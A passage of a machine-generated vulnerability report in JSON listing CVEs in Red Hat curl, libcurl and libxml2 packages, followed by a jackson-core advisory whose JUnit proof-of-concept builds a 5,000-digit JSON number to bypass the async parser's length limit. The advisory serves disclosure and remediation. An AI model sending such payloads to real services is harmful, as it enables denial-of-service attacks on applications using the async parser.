"urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-6276", "ratings": [ { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "description": "A flaw was found in libcurl. This vulnerability allows for information disclosure when a custom `Host:` header is used in an initial HTTP request, and a subsequent request reuses the same connection without specifying a new `Host:` header. This can lead to libcurl incorrectly sending cookies intended for the first host to the second host, resulting in a cookie leak. This issue is categorized as an Origin Validation Error (CWE-346). Exploitation typically requires specific debugging configurations.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-6276" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-6276" }, { "url": "https://curl.se/docs/CVE-2026-6276.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6276" }, { "url": "https://ubuntu.com/security/notices/USN-8227-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-6276" } ], "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-6429", "ratings": [ { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "description": "A flaw was found in libcurl. When configured to use a .netrc file for credentials and follow HTTP redirects, libcurl can inadvertently send the password from the initial connection to the redirected host. This sensitive information disclosure occurs when both the original and redirect URLs use clear text HTTP, are performed over the same HTTP proxy, and the same connection is reused. This vulnerability, categorized as an Exposure of Sensitive Information to an Unauthorized Actor (CWE-200), could allow an attacker to obtain user credentials.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-6429" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-6429" }, { "url": "https://curl.se/docs/CVE-2026-6429.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6429" }, { "url": "https://ubuntu.com/security/notices/USN-8227-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-6429" } ], "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-6732", "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 843 ], "description": "A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-6732" }, { "url": "https://access.redhat.com/errata/RHSA-2026:11503" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-6732" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461300" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1097" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/411" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6732" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-6732" } ], "published": "2026-04-23T23:16:16+00:00", "updated": "2026-05-05T13:58:51+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "GHSA-72hv-8253-57qq", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [], "description": "### Summary\nThe non-blocking (async) JSON parser in `jackson-core` bypasses the `maxNumberLength` constraint (default: 1000 characters) defined in `StreamReadConstraints`. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS).\n\nThe standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy.\n\n### Details\nThe root cause is that the async parsing path in `NonBlockingUtf8JsonParserBase` (and related classes) does not call the methods responsible for number length validation.\n\n- The number parsing methods (e.g., `_finishNumberIntegralPart`) accumulate digits into the `TextBuffer` without any length checks.\n- After parsing, they call `_valueComplete()`, which finalizes the token but does **not** call `resetInt()` or `resetFloat()`.\n- The `resetInt()`/`resetFloat()` methods in `ParserBase` are where the `validateIntegerLength()` and `validateFPLength()` checks are performed.\n- Because this validation step is skipped, the `maxNumberLength` constraint is never enforced in the async code path.\n\n### PoC\nThe following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.\n\n```java\npackage tools.jackson.core.unittest.dos;\n\nimport java.nio.charset.StandardCharsets;\n\nimport org.junit.jupiter.api.Test;\n\nimport tools.jackson.core.*;\nimport tools.jackson.core.exc.StreamConstraintsException;\nimport tools.jackson.core.json.JsonFactory;\nimport tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;\n\nimport static org.junit.jupiter.api.Assertions.*;\n\n/**\n * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers\n *\n * Authors: sprabhav7, rohan-repos\n * \n * maxNumberLength default = 1000 characters (digits).\n * A number with more than 1000 digits should be rejected by any parser.\n *\n * BUG: The async parser never calls resetInt()/resetFloat() which is where\n * validateIntegerLength()/validateFPLength() lives. Instead it calls\n * _valueComplete() which skips all number length validation.\n *\n * CWE-770: Allocation of Resources Without Limits or Throttling\n */\nclass AsyncParserNumberLengthBypassTest {\n\n private static final int MAX_NUMBER_LENGTH = 1000;\n private static final int TEST_NUMBER_LENGTH = 5000;\n\n private final JsonFactory factory = new JsonFactory();\n\n // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength\n @Test\n void syncParserRejectsLongNumber() throws Exception {\n byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);\n\t\t\n\t\t// Output to console\n System.out.println(\"[SYNC] Parsing \" + TEST_NUMBER_LENGTH + \"-digit number (limit: \" + MAX_NUMBER_LENGTH + \")\");\n try {\n try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {\n while (p.nextToken() != null) {\n if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {\n System.out.println(\"[SYNC] Accepted number with \" + p.getText().length() + \" digits \u2014 UNEXPECTED\");\n }\n }\n }\n fail(\"Sync parser must reject a \" + TEST_NUMBER_LENGTH + \"-digit number\");\n } catch (StreamConstraintsException e) {\n System.out.println(\"[SYNC] Rejected with StreamConstraintsException: \" + e.getMessage());\n }\n }\n\n // VULNERABILITY: Async parser accepts the SAME number that sync rejects\n @Test\n void asyncParserAcceptsLongNumber() throws Exception {\n byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);\n\n NonBlockingByteArrayJsonParser p =\n (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());\n p.feedInput(payload, 0, payload.length);\n p.endOfInput();\n\n boolean foundNumber = false;\n try {\n while (p.nextToken() != null) {\n if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {\n foundNumber = true;\n String numberText = p.getText();\n assertEquals(TEST_NUMBER_LENGTH, numberText.length(),\n \"Async parser silently accepted all \" + TEST_NUMBER_LENGTH + \" digits\");\n }\n }\n // Output to console\n System.out.println(\"[ASYNC INT] Accepted number with \" + TEST_NUMBER_LENGTH + \" digits \u2014 BUG CONFIRMED\");\n assertTrue(foundNumber, \"Parser should have produced a VALUE_NUMBER_INT token\");\n } catch (StreamConstraintsException e) {\n fail(\"Bug is fixed \u2014 async parser now correctly rejects long numbers: \" + e.getMessage());\n }\n p.close();\n }\n\n private byte[] buildPayloadWithLongInteger(int numDigits) {\n StringBuilder sb = new StringBuilder(numDigits + 10);\n sb.append(\"{\\\"v\\\":\");\n for (int i = 0; i < numDigits; i++) {\n sb.append((char) ('1' + (i % 9)));\n }\n sb.append('}');\n return sb.toString().getBytes(StandardCharsets.UTF_8);\n }\n}\n\n```\n\n\n### Impact\nA malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause:\n1. **Memory Exhaustion:** Unbounded allocation of memory in the `TextBuffer` to store the number's digits, leading to an `OutOfMemoryError`.\n2. **CPU Exhaustion:** If the application subsequently calls `getBigIntegerValue()` or `getDecimalValue()`, the JVM can be tied up in O(n^2) `BigInteger` parsing operations, leading to a CPU-based DoS.\n\n### Suggested Remediation\n\nThe async parsing path should be updated to respect the `maxNumberLength` constraint. The simplest fix appears to ensure that `_valueComplete()` or a similar method in the async path calls the appropriate validation methods (`resetInt()` or `resetFloat()`) already present in `ParserBase`, mirroring the behavior of the synchronous parsers.\n\n**NOTE:** This 